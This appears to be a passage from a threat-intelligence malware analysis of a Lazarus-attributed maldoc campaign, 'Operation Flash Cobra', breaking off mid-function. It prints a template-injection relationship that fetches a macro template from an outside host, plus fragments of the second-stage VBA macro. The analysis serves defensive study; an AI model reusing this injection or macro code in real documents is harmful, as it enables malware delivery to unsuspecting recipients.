lazarusholic

Everyday is lazarus.dayβ

Operation Flash Cobra

2020-05-05, StrangerealIntel
https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/North%20Korea/APT/Lazarus/2020-05-05/Analysis.md
#FlashCobra #Lazarus

Contents

## Operation Flash Cobra
## Table of Contents
* [Malware analysis](#Malware-analysis)
* [Threat intelligence](#TI)
* [Cyber kill chain](#Cyber-kill-chain)
* [Indicators Of Compromise (IOC)](#IOC)
* [References MITRE ATT&CK Matrix](#Ref-MITRE-ATTACK)
* [Links](#Links)
+ [Original Tweet](#tweet)
+ [Link Anyrun](#Links-Anyrun)
+ [Articles](#Articles)
<h2>Malware analysis <a name="Malware-analysis"></a></h2>
<h6>The initial vector is a maldoc using a template injection for download and execute the next stager.</h6>

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://od.lk/d/MzBfMjA1Njc0ODdf/pubmaterial.dotm" TargetMode="External"/>
</Relationships>
```

<h6>The second stager use a document with a macro. The first block define the alias functions for the rest of the script.</h6>

```vb
Private Declare PtrSafe Function CoContentInfo Lib "onenote.db" (ByVal lpDocPath As String, ByVal lpPass As String, ByVal lpUID As String) As Long
Private Declare PtrSafe Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As LongPtr
```

<h6>The next three functions give the abilities to create a new folder, check the existence of a file and folder.</h6>

```vb
Function MkDir(szDir)
On Error Resume Next
MkDir = CreateObject("Scripting.FileSystemObject").CreateFolder(szDir)
End Function
Function FileExist(szFile)
On Error Resume Next
FileExist = CreateObject("Scripting.FileSystemObject").FileExists(szFile)
End Function
Function FolderExist(szFolder)
On …